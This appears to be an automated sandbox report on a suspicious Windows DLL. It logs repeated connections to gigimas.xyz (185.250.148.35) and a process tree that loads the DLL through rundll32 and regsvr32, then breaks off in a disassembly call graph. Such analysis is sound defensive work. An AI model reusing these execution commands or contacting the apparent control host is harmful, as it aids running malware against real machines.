                              Nov 24, 2022 05:32:43.601726055 CET44349722185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:43.611546993 CET49723443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:43.611643076 CET44349723185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:43.611826897 CET49723443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:43.612270117 CET49723443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:43.612310886 CET44349723185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:43.669603109 CET44349723185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:43.671479940 CET49724443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:43.671566963 CET44349724185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:43.671897888 CET49724443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:43.672238111 CET49724443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:43.672307014 CET44349724185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:43.729829073 CET44349724185.250.148.35192.168.2.3
                              Nov 24, 2022 05:33:13.901851892 CET49725443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:33:13.901915073 CET44349725185.250.148.35192.168.2.3
                              Nov 24, 2022 05:33:13.902000904 CET49725443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:33:13.902689934 CET49725443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:33:13.902705908 CET44349725185.250.148.35192.168.2.3
                              Nov 24, 2022 05:33:13.958076000 CET44349725185.250.148.35192.168.2.3
                              Nov 24, 2022 05:33:13.960711002 CET49726443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:33:13.960813999 CET44349726185.250.148.35192.168.2.3
                              Nov 24, 2022 05:33:13.961004019 CET49726443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:33:13.962261915 CET49726443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:33:13.962327957 CET44349726185.250.148.35192.168.2.3
                              Nov 24, 2022 05:33:14.020241976 CET44349726185.250.148.35192.168.2.3
                              Nov 24, 2022 05:33:14.022346973 CET49727443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:33:14.022407055 CET44349727185.250.148.35192.168.2.3
                              Nov 24, 2022 05:33:14.022514105 CET49727443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:33:14.023082972 CET49727443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:33:14.023117065 CET44349727185.250.148.35192.168.2.3
                              Nov 24, 2022 05:33:14.079648018 CET44349727185.250.148.35192.168.2.3
                              Nov 24, 2022 05:33:14.083456993 CET49728443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:33:14.083499908 CET44349728185.250.148.35192.168.2.3
                              Nov 24, 2022 05:33:14.083667040 CET49728443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:33:14.084922075 CET49728443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:33:14.084939003 CET44349728185.250.148.35192.168.2.3
                              Nov 24, 2022 05:33:14.142575026 CET44349728185.250.148.35192.168.2.3

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 24, 2022 05:31:42.716654062 CET5397553192.168.2.38.8.8.8
                              Nov 24, 2022 05:31:42.749726057 CET53539758.8.8.8192.168.2.3
                              Nov 24, 2022 05:32:13.117352009 CET5113953192.168.2.38.8.8.8
                              Nov 24, 2022 05:32:13.137461901 CET53511398.8.8.8192.168.2.3
                              Nov 24, 2022 05:32:43.461288929 CET5295553192.168.2.38.8.8.8
                              Nov 24, 2022 05:32:43.481966019 CET53529558.8.8.8192.168.2.3
                              Nov 24, 2022 05:33:13.880306959 CET6058253192.168.2.38.8.8.8
                              Nov 24, 2022 05:33:13.900351048 CET53605828.8.8.8192.168.2.3

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Nov 24, 2022 05:31:42.716654062 CET192.168.2.38.8.8.80xefb3Standard query (0)gigimas.xyzA (IP address)IN (0x0001)false
                              Nov 24, 2022 05:32:13.117352009 CET192.168.2.38.8.8.80x493dStandard query (0)gigimas.xyzA (IP address)IN (0x0001)false
                              Nov 24, 2022 05:32:43.461288929 CET192.168.2.38.8.8.80x7cb8Standard query (0)gigimas.xyzA (IP address)IN (0x0001)false
                              Nov 24, 2022 05:33:13.880306959 CET192.168.2.38.8.8.80xb47aStandard query (0)gigimas.xyzA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Nov 24, 2022 05:31:42.749726057 CET8.8.8.8192.168.2.30xefb3No error (0)gigimas.xyz185.250.148.35A (IP address)IN (0x0001)false
                              Nov 24, 2022 05:32:13.137461901 CET8.8.8.8192.168.2.30x493dNo error (0)gigimas.xyz185.250.148.35A (IP address)IN (0x0001)false
                              Nov 24, 2022 05:32:43.481966019 CET8.8.8.8192.168.2.30x7cb8No error (0)gigimas.xyz185.250.148.35A (IP address)IN (0x0001)false
                              Nov 24, 2022 05:33:13.900351048 CET8.8.8.8192.168.2.30xb47aNo error (0)gigimas.xyz185.250.148.35A (IP address)IN (0x0001)false

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:05:30:30
                              Start date:24/11/2022
                              Path:C:\Windows\System32\loaddll64.exe
                              Wow64 process (32bit):false
                              Commandline:loaddll64.exe "C:\Users\user\Desktop\pzG0rkIchr.dll"
                              Imagebase:0x7ff719eb0000
                              File size:139776 bytes
                              MD5 hash:C676FC0263EDD17D4CE7D644B8F3FCD6
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:1
                              Start time:05:30:31
                              Start date:24/11/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff745070000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:2
                              Start time:05:30:31
                              Start date:24/11/2022
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1
                              Imagebase:0x7ff707bb0000
                              File size:273920 bytes
                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:3
                              Start time:05:30:31
                              Start date:24/11/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:regsvr32.exe /s C:\Users\user\Desktop\pzG0rkIchr.dll
                              Imagebase:0x7ff64da50000
                              File size:24064 bytes
                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:4
                              Start time:05:30:31
                              Start date:24/11/2022
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1
                              Imagebase:0x7ff6f9b90000
                              File size:69632 bytes
                              MD5 hash:73C519F050C20580F8A62C849D49215A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:5
                              Start time:05:30:31
                              Start date:24/11/2022
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,DllRegisterServer
                              Imagebase:0x7ff6f9b90000
                              File size:69632 bytes
                              MD5 hash:73C519F050C20580F8A62C849D49215A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:6
                              Start time:05:30:36
                              Start date:24/11/2022
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,ItsnPq5v
                              Imagebase:0x7ff6f9b90000
                              File size:69632 bytes
                              MD5 hash:73C519F050C20580F8A62C849D49215A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:8
                              Start time:05:30:40
                              Start date:24/11/2022
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,QlqYo259k
                              Imagebase:0x7ff6f9b90000
                              File size:69632 bytes
                              MD5 hash:73C519F050C20580F8A62C849D49215A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:12
                              Start time:05:30:50
                              Start date:24/11/2022
                              Path:C:\Windows\System32\WerFault.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\WerFault.exe -u -p 6044 -s 276
                              Imagebase:0x7ff679980000
                              File size:494488 bytes
                              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Target ID:13
                              Start time:05:30:50
                              Start date:24/11/2022
                              Path:C:\Windows\System32\WerFault.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\WerFault.exe -u -p 6136 -s 304
                              Imagebase:0x7ff679980000
                              File size:494488 bytes
                              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Target ID:14
                              Start time:05:31:19
                              Start date:24/11/2022
                              Path:C:\Windows\System32\WerFault.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\WerFault.exe -u -p 6136 -s 304
                              Imagebase:0x7ff679980000
                              File size:494488 bytes
                              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:10.1%
                                Dynamic/Decrypted Code Coverage:34.3%
                                Signature Coverage:12.8%
                                Total number of Nodes:1751
                                Total number of Limit Nodes:20
                                execution_graph 11087 7ffc130f5d9b 11088 7ffc130f5ddb 11087->11088 11089 7ffc130f6040 11087->11089 11088->11089 11090 7ffc130f6022 11088->11090 11091 7ffc130f5e0f 11088->11091 11093 7ffc130f6660 _log10_special 24 API calls 11089->11093 11094 7ffc130f6036 11089->11094 11095 7ffc130f6660 11090->11095 11093->11094 11098 7ffc130f6680 11095->11098 11099 7ffc130f669a 11098->11099 11100 7ffc130f667b 11099->11100 11102 7ffc130f64bc 11099->11102 11100->11094 11103 7ffc130f64fc _ctrlfp _handle_error 11102->11103 11105 7ffc130f6568 _handle_error 11103->11105 11113 7ffc130f67e0 11103->11113 11106 7ffc130f65a5 11105->11106 11108 7ffc130f6575 11105->11108 11120 7ffc130f6b10 11106->11120 11116 7ffc130f6398 11108->11116 11110 7ffc130f65a3 _ctrlfp 11111 7ffc130f6d80 _handle_error 8 API calls 11110->11111 11112 7ffc130f65cd 11111->11112 11112->11100 11126 7ffc130f6808 11113->11126 11117 7ffc130f63dc _ctrlfp _handle_error 11116->11117 11118 7ffc130f63f1 11117->11118 11119 7ffc130f6b10 _set_errno_from_matherr 15 API calls 11117->11119 11118->11110 11119->11118 11121 7ffc130f6b19 11120->11121 11122 7ffc130f6b2e 11120->11122 11124 7ffc130ee6a0 _get_daylight 15 API calls 11121->11124 11125 7ffc130f6b26 11121->11125 11123 7ffc130ee6a0 _get_daylight 15 API calls 11122->11123 11123->11125 11124->11125 11125->11110 11127 7ffc130f6847 _raise_exc _clrfp 11126->11127 11128 7ffc130f6a5a RaiseException 11127->11128 11129 7ffc130f6802 11128->11129 11129->11105 11130 7ffc130edf94 11133 7ffc130eda90 11130->11133 11140 7ffc130eda58 11133->11140 11138 7ffc130eda14 15 API calls 11139 7ffc130edab8 11138->11139 11141 7ffc130eda68 11140->11141 11142 7ffc130eda6d 11140->11142 11143 7ffc130eda14 15 API calls 11141->11143 11144 7ffc130eda74 11142->11144 11143->11142 11145 7ffc130eda89 11144->11145 11146 7ffc130eda84 11144->11146 11145->11138 11147 7ffc130eda14 15 API calls 11146->11147 11147->11145 11374 7ffc130f0a14 GetCommandLineA GetCommandLineW 11375 7ffc130ec914 11376 7ffc130ec92e 11375->11376 11377 7ffc130ec91d 11375->11377 11377->11376 11378 7ffc130ee114 __free_lconv_num 15 API calls 11377->11378 11378->11376 11379 7ffc130eef10 11380 7ffc130eef15 11379->11380 11381 7ffc130eef2a 11379->11381 11382 7ffc130eef30 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 11380->11382 11383 7ffc130eef22 11382->11383 11384 7ffc130ee114 __free_lconv_num 15 API calls 11383->11384 11384->11381 11385 7ffc130feb11 11386 7ffc130feb21 11385->11386 11389 7ffc130ee848 LeaveCriticalSection 11386->11389 11390 7ffc130f2e10 11391 7ffc130f2e3d 11390->11391 11392 7ffc130ee6a0 _get_daylight 15 API calls 11391->11392 11397 7ffc130f2e52 11391->11397 11393 7ffc130f2e47 11392->11393 11395 7ffc130ee580 _invalid_parameter_noinfo 32 API calls 11393->11395 11394 7ffc130f6d80 _handle_error 8 API calls 11396 7ffc130f3137 11394->11396 11395->11397 11397->11394 11398 7ffc130ef90c 11399 7ffc130ef945 11398->11399 11401 7ffc130ef916 11398->11401 11400 7ffc130ef92b FreeLibrary 11400->11401 11401->11399 11401->11400 11402 7ffc130f150c 11403 7ffc130f1540 11402->11403 11404 7ffc130f1536 11402->11404 11404->11403 11405 7ffc130ee2e4 36 API calls 11404->11405 11406 7ffc130f1573 11405->11406 11406->11403 11414 7ffc130f3f44 11406->11414 11409 7ffc130f15ac 11411 7ffc130f15e9 11409->11411 11412 7ffc130f15bf MultiByteToWideChar 11409->11412 11410 7ffc130f15fd MultiByteToWideChar 11410->11403 11410->11411 11411->11403 11413 7ffc130ee6a0 _get_daylight 15 API calls 11411->11413 11412->11403 11412->11411 11413->11403 11415 7ffc130ee2e4 36 API calls 11414->11415 11416 7ffc130f15a3 11415->11416 11416->11409 11416->11410 11417 7ffc130ef208 11424 7ffc130ef50c 11417->11424 11420 7ffc130ef223 11421 7ffc130ef168 _get_daylight 15 API calls 11422 7ffc130ef22c 11421->11422 11422->11420 11423 7ffc130ef244 __vcrt_uninitialize_ptd 6 API calls 11422->11423 11423->11420 11425 7ffc130ef320 __vcrt_uninitialize_ptd 5 API calls 11424->11425 11426 7ffc130ef538 11425->11426 11427 7ffc130ef550 TlsAlloc 11426->11427 11428 7ffc130ef218 11426->11428 11427->11428 11428->11420 11428->11421 11429 7ffc130fec08 11430 7ffc130fec1a 11429->11430 11431 7ffc130fec24 11429->11431 11433 7ffc130ef304 LeaveCriticalSection 11430->11433 11434 201640c5c80 11435 201640c5ca5 11434->11435 11440 201640c5d44 11435->11440 11446 201640c88c8 HeapAlloc 11435->11446 11437 201640c5ce0 11437->11440 11456 201640ca5b0 11437->11456 11443 201640c5d38 11484 201640c6080 11443->11484 11444 201640c5d28 HeapFree 11444->11440 11447 201640c8922 11446->11447 11453 201640c8967 11446->11453 11448 201640c487a memset 11447->11448 11449 201640c892f 11448->11449 11494 201640c5fc8 11449->11494 11452 201640c894d HeapAlloc 11452->11453 11454 201640c8974 11452->11454 11453->11437 11455 201640c908c SetLastError 11454->11455 11455->11453 11457 201640ca5f6 11456->11457 11458 201640ca694 11457->11458 11460 201640ca6d5 11457->11460 11514 201640c6c34 11458->11514 11538 201640c6518 11460->11538 11463 201640ca759 11465 201640c5d03 11463->11465 11467 201640ca778 HeapFree 11463->11467 11465->11440 11468 201640c7b6c 11465->11468 11467->11465 11470 201640c7bb6 11468->11470 11469 201640c5d22 11469->11443 11469->11444 11470->11469 11682 201640c87b0 11470->11682 11472 201640c7beb 11472->11469 11473 201640c7c1c 11472->11473 11686 201640c77b0 11472->11686 11475 201640c7cae 11473->11475 11692 201640c1a80 11473->11692 11476 201640c487a memset 11475->11476 11478 201640c7cc2 HeapFree 11476->11478 11478->11469 11479 201640c7c5a 11480 201640c7c8e 11479->11480 11481 201640c7c79 HeapFree 11479->11481 11482 201640c487a memset 11480->11482 11481->11480 11483 201640c7ca0 HeapFree 11482->11483 11483->11475 11485 201640c60b5 11484->11485 11493 201640c619d 11484->11493 11486 201640c908c SetLastError 11485->11486 11487 201640c60c4 11486->11487 11488 201640c908c SetLastError 11487->11488 11487->11493 11489 201640c6128 11488->11489 11489->11493 11805 201640c5d68 11489->11805 11492 201640c908c SetLastError 11492->11493 11493->11440 11495 201640c908c SetLastError 11494->11495 11496 201640c5ff7 11495->11496 11497 201640c5ffc LoadLibraryA 11496->11497 11498 201640c6006 11496->11498 11497->11498 11499 201640c600d 11498->11499 11500 201640c6048 11498->11500 11506 201640c40f8 11499->11506 11502 201640c908c SetLastError 11500->11502 11505 201640c6020 11502->11505 11504 201640c908c SetLastError 11504->11505 11505->11452 11505->11453 11507 201640c414f 11506->11507 11513 201640c42eb 11506->11513 11508 201640c415d HeapAlloc 11507->11508 11507->11513 11509 201640c418e 11508->11509 11508->11513 11510 201640c487a memset 11509->11510 11511 201640c419e 11510->11511 11512 201640c42f0 HeapFree 11511->11512 11511->11513 11512->11513 11513->11504 11513->11505 11515 201640c908c SetLastError 11514->11515 11516 201640c6c69 HeapAlloc 11515->11516 11518 201640c6c9d 11516->11518 11519 201640c6cc3 11516->11519 11550 201640ca560 mbstowcs 11518->11550 11519->11463 11523 201640c11f4 11519->11523 11524 201640c908c SetLastError 11523->11524 11525 201640c1234 11524->11525 11526 201640c12c7 11525->11526 11527 201640c908c SetLastError 11525->11527 11528 201640c908c SetLastError 11526->11528 11531 201640c1294 11526->11531 11529 201640c127e 11527->11529 11528->11531 11530 201640c129e HeapAlloc 11529->11530 11529->11531 11530->11526 11532 201640c12b9 11530->11532 11533 201640c908c SetLastError 11531->11533 11537 201640c133e 11531->11537 11535 201640c908c SetLastError 11532->11535 11533->11537 11534 201640c135f HeapFree 11534->11463 11535->11526 11536 201640c1351 HeapFree 11536->11534 11537->11534 11537->11536 11539 201640c654d 11538->11539 11540 201640c487a memset 11539->11540 11541 201640c6562 11540->11541 11552 201640c4a80 11541->11552 11545 201640c65b9 11549 201640c65c9 11545->11549 11589 201640c2664 11545->11589 11608 201640c5ee8 11549->11608 11551 201640cc038 11550->11551 11553 201640c4abe 11552->11553 11554 201640c4ace 11552->11554 11624 201640c9b88 11553->11624 11558 201640c4ad2 11554->11558 11631 201640c31c0 11554->11631 11558->11545 11558->11549 11566 201640c204c 11558->11566 11559 201640c4b1a 11559->11558 11561 201640c908c SetLastError 11559->11561 11560 201640c6c34 4 API calls 11560->11559 11562 201640c4b49 11561->11562 11660 201640c75f8 11562->11660 11565 201640c4b7d HeapFree 11565->11558 11567 201640c208b 11566->11567 11568 201640c2250 11566->11568 11569 201640c908c SetLastError 11567->11569 11568->11545 11570 201640c20a0 11569->11570 11571 201640c2257 11570->11571 11573 201640c908c SetLastError 11570->11573 11572 201640c908c SetLastError 11571->11572 11572->11568 11574 201640c20c9 11573->11574 11574->11571 11575 201640c2102 11574->11575 11576 201640c908c SetLastError 11575->11576 11577 201640c211a HeapAlloc 11576->11577 11577->11568 11579 201640c2163 11577->11579 11580 201640c908c SetLastError 11579->11580 11581 201640c2171 11580->11581 11582 201640c2222 11581->11582 11583 201640c21a4 HeapAlloc 11581->11583 11584 201640c908c SetLastError 11582->11584 11585 201640c21ce 11583->11585 11588 201640c21dc HeapFree 11583->11588 11584->11588 11586 201640c908c SetLastError 11585->11586 11586->11588 11588->11568 11590 201640c908c SetLastError 11589->11590 11591 201640c269a 11590->11591 11592 201640c282f 11591->11592 11593 201640c26b6 11591->11593 11595 201640c908c SetLastError 11592->11595 11594 201640c26c0 HeapAlloc 11593->11594 11597 201640c282a 11593->11597 11596 201640c2800 11594->11596 11603 201640c26e9 11594->11603 11595->11597 11596->11597 11598 201640c2810 HeapFree 11596->11598 11597->11549 11598->11597 11599 201640c908c SetLastError 11599->11603 11601 201640c27e1 HeapFree 11601->11596 11602 201640c27f3 11601->11602 11677 201640c1ef0 11602->11677 11603->11599 11603->11601 11605 201640c27bc 11603->11605 11607 201640c27ca 11603->11607 11670 201640c8c6c 11603->11670 11606 201640c908c SetLastError 11605->11606 11606->11607 11607->11601 11609 201640c5f0f 11608->11609 11610 201640c5f1d 11608->11610 11611 201640c908c SetLastError 11609->11611 11612 201640c5f3d 11610->11612 11613 201640c908c SetLastError 11610->11613 11611->11610 11614 201640c5f5d 11612->11614 11615 201640c908c SetLastError 11612->11615 11613->11612 11616 201640c5f7c 11614->11616 11617 201640c5f71 HeapFree 11614->11617 11615->11614 11618 201640c5f90 11616->11618 11619 201640c5f85 HeapFree 11616->11619 11617->11616 11620 201640c5f99 HeapFree 11618->11620 11621 201640c5fa4 11618->11621 11619->11618 11620->11621 11622 201640c5fad HeapFree 11621->11622 11623 201640c5fb8 11621->11623 11622->11623 11623->11463 11625 201640c908c SetLastError 11624->11625 11626 201640c9bc9 HeapAlloc 11625->11626 11628 201640c9bfc HeapAlloc 11626->11628 11630 201640c9c16 11626->11630 11629 201640c9c9d HeapFree 11628->11629 11628->11630 11629->11630 11630->11554 11632 201640c6c34 4 API calls 11631->11632 11635 201640c3203 11632->11635 11633 201640c3469 11634 201640c908c SetLastError 11633->11634 11636 201640c344e 11634->11636 11635->11633 11637 201640c908c SetLastError 11635->11637 11636->11558 11636->11559 11636->11560 11638 201640c3242 HeapFree 11637->11638 11638->11633 11640 201640c327e 11638->11640 11641 201640c908c SetLastError 11640->11641 11643 201640c3297 11640->11643 11641->11643 11642 201640c6c34 4 API calls 11644 201640c32c9 11642->11644 11643->11633 11643->11642 11644->11633 11645 201640c908c SetLastError 11644->11645 11647 201640c32fc 11644->11647 11645->11647 11646 201640c908c SetLastError 11648 201640c3339 HeapFree 11646->11648 11647->11646 11648->11633 11650 201640c336f 11648->11650 11651 201640c6c34 4 API calls 11650->11651 11652 201640c337a 11651->11652 11652->11633 11653 201640c908c SetLastError 11652->11653 11654 201640c3394 HeapFree 11653->11654 11654->11633 11656 201640c33f9 11654->11656 11657 201640c908c SetLastError 11656->11657 11658 201640c3410 11657->11658 11658->11636 11659 201640c908c SetLastError 11658->11659 11659->11636 11664 201640c7638 11660->11664 11661 201640c771c 11663 201640c908c SetLastError 11661->11663 11668 201640c4b76 11661->11668 11662 201640c908c SetLastError 11662->11664 11665 201640c774d 11663->11665 11664->11661 11664->11662 11667 201640c770e 11664->11667 11664->11668 11666 201640c908c SetLastError 11665->11666 11665->11668 11666->11668 11669 201640c908c SetLastError 11667->11669 11668->11558 11668->11565 11669->11661 11671 201640c8caa 11670->11671 11674 201640c8cf7 11670->11674 11672 201640c8cc9 HeapAlloc 11671->11672 11673 201640c8d3a HeapAlloc 11671->11673 11672->11674 11675 201640c8cd7 11672->11675 11673->11674 11674->11603 11676 201640c8ce6 HeapFree 11675->11676 11676->11674 11678 201640c1f1a HeapAlloc 11677->11678 11680 201640c1f5c 11677->11680 11679 201640c1f31 11678->11679 11678->11680 11679->11680 11681 201640c1f4c HeapFree 11679->11681 11680->11596 11681->11680 11683 201640c87e4 11682->11683 11685 201640c8804 11682->11685 11684 201640c87ec HeapAlloc 11683->11684 11683->11685 11684->11685 11685->11472 11687 201640c77fc 11686->11687 11688 201640c7853 11686->11688 11687->11688 11689 201640c782a HeapAlloc 11687->11689 11688->11473 11689->11688 11690 201640c7846 11689->11690 11691 201640c487a memset 11690->11691 11691->11688 11693 201640c1ac8 11692->11693 11694 201640c1ae2 HeapAlloc 11693->11694 11703 201640c1bb7 11693->11703 11695 201640c1aff 11694->11695 11694->11703 11704 201640c98b4 11695->11704 11698 201640c1bd3 HeapFree 11698->11703 11702 201640c1ba6 11702->11698 11702->11703 11703->11479 11705 201640c98eb 11704->11705 11706 201640c1b35 11704->11706 11736 201640cb160 11705->11736 11706->11698 11710 201640c3cd8 11706->11710 11708 201640c9902 11708->11706 11709 201640c487a memset 11708->11709 11709->11706 11711 201640c908c SetLastError 11710->11711 11712 201640c3d15 11711->11712 11713 201640c3d40 11712->11713 11714 201640c3f1a 11712->11714 11794 201640c7e40 11713->11794 11716 201640c908c SetLastError 11714->11716 11722 201640c1b8c 11716->11722 11718 201640c3ef0 11720 201640c908c SetLastError 11718->11720 11719 201640c487a memset 11721 201640c3d7a 11719->11721 11720->11722 11723 201640c908c SetLastError 11721->11723 11722->11698 11732 201640c4f24 11722->11732 11724 201640c3d88 11723->11724 11725 201640c908c SetLastError 11724->11725 11727 201640c3db5 11724->11727 11725->11727 11726 201640c908c SetLastError 11726->11727 11727->11718 11727->11726 11728 201640c3eb9 11727->11728 11730 201640c3ec7 11727->11730 11729 201640c908c SetLastError 11728->11729 11729->11730 11731 201640c908c SetLastError 11730->11731 11731->11718 11733 201640c4f48 11732->11733 11802 201640c8fac 11733->11802 11735 201640c4f65 11735->11702 11749 201640c1fa8 11736->11749 11739 201640c1fa8 memset 11740 201640cb1b9 11739->11740 11741 201640c1fa8 memset 11740->11741 11742 201640cb1d3 11741->11742 11743 201640cb211 11742->11743 11753 201640c6768 11742->11753 11743->11708 11750 201640c1fc6 11749->11750 11751 201640c2017 11750->11751 11752 201640c487a memset 11750->11752 11751->11739 11752->11751 11754 201640c67b2 11753->11754 11767 201640c1380 11754->11767 11774 201640c43f8 11767->11774 11775 201640c487a memset 11774->11775 11776 201640c443d 11775->11776 11777 201640c487a memset 11776->11777 11778 201640c13ac 11777->11778 11779 201640c2a4c 11778->11779 11782 201640c78c4 11779->11782 11784 201640c7901 11782->11784 11783 201640c2a72 11784->11783 11785 201640c487a memset 11784->11785 11786 201640c795b 11785->11786 11787 201640c487a memset 11786->11787 11792 201640c79a9 11787->11792 11788 201640c487a memset 11789 201640c7b14 11788->11789 11790 201640c487a memset 11789->11790 11791 201640c7b3f 11790->11791 11793 201640c487a memset 11791->11793 11792->11788 11793->11783 11795 201640c7e95 11794->11795 11796 201640c7eaf 11795->11796 11797 201640c487a memset 11795->11797 11798 201640c908c SetLastError 11796->11798 11797->11796 11800 201640c7ebd 11798->11800 11799 201640c3d5f 11799->11718 11799->11719 11800->11799 11801 201640c908c SetLastError 11800->11801 11801->11799 11803 201640c487a memset 11802->11803 11804 201640c8fcc 11803->11804 11804->11735 11807 201640c5dc4 11805->11807 11811 201640c1604 11807->11811 11808 201640c5e0a 11810 201640c5e4e 11808->11810 11816 201640c9528 11808->11816 11810->11492 11810->11493 11812 201640c16bc 11811->11812 11813 201640c1638 11811->11813 11812->11808 11813->11812 11814 201640c908c SetLastError 11813->11814 11824 201640c5a04 11813->11824 11814->11813 11817 201640c908c SetLastError 11816->11817 11818 201640c9584 11817->11818 11819 201640c9731 11818->11819 11822 201640c95a8 11818->11822 11820 201640c908c SetLastError 11819->11820 11821 201640c972f 11820->11821 11821->11810 11822->11821 11823 201640c908c SetLastError 11822->11823 11823->11822 11825 201640c5b32 11824->11825 11827 201640c5a45 11824->11827 11825->11813 11826 201640c908c SetLastError 11826->11827 11827->11825 11827->11826 10271 7ffc130e2380 10272 7ffc13101440 GetProcessHeap HeapAlloc 10271->10272 10273 7ffc13101484 __scrt_fastfail 10272->10273 10274 7ffc1310169c 10273->10274 10291 7ffc130e3db0 10273->10291 10275 7ffc13101a3a 10274->10275 10276 7ffc131016bf 10274->10276 10279 7ffc13101a5b 10275->10279 10290 7ffc13101a23 10275->10290 10306 7ffc130e4820 10276->10306 10368 7ffc130fe7e0 10279->10368 10283 7ffc13101bf0 CreateFileA TryEnterCriticalSection 10376 7ffc130f9f80 10283->10376 10292 7ffc130e3e79 10291->10292 10293 7ffc130e3eea 10291->10293 10387 7ffc130eae80 10292->10387 10295 7ffc130e4184 10293->10295 10296 7ffc130e3f21 10293->10296 10430 7ffc130e5840 10295->10430 10298 7ffc130f9f80 24 API calls 10296->10298 10299 7ffc130e3f6a 10298->10299 10401 7ffc130ea970 10299->10401 10301 7ffc130e403d 10417 7ffc130ea2f0 10301->10417 10305 7ffc130e4154 10305->10274 10307 7ffc130e4ab2 10306->10307 10308 7ffc130e48bf 10306->10308 10310 7ffc130e4c58 10307->10310 10313 7ffc130f98f0 160 API calls 10307->10313 10633 7ffc130faa10 10308->10633 10319 7ffc130e4c80 10310->10319 10313->10307 10316 7ffc130e4a40 10660 7ffc130e1000 10316->10660 10320 7ffc130e55e4 10319->10320 10321 7ffc130e4d47 10319->10321 10322 7ffc130e57b4 10320->10322 10323 7ffc130e560d 10320->10323 10324 7ffc130e5576 LockFile PeekNamedPipe 10321->10324 10325 7ffc130e4d5e GetProcAddress 10321->10325 10326 7ffc130e579d 10322->10326 10330 7ffc130e57df 10322->10330 10323->10326 10328 7ffc130e5640 10323->10328 10324->10326 10329 7ffc130e4e78 VirtualAlloc 10325->10329 10334 7ffc130e507a 10325->10334 10344 7ffc130fdf20 10326->10344 10331 7ffc130e2060 CreateThread 10328->10331 10329->10334 10335 7ffc130e4ec8 10329->10335 10332 7ffc130e57e0 CreateFileA 10330->10332 10333 7ffc130e56eb SetEndOfFile 10331->10333 10332->10326 10332->10332 10333->10326 10337 7ffc130e9ba0 160 API calls 10334->10337 10336 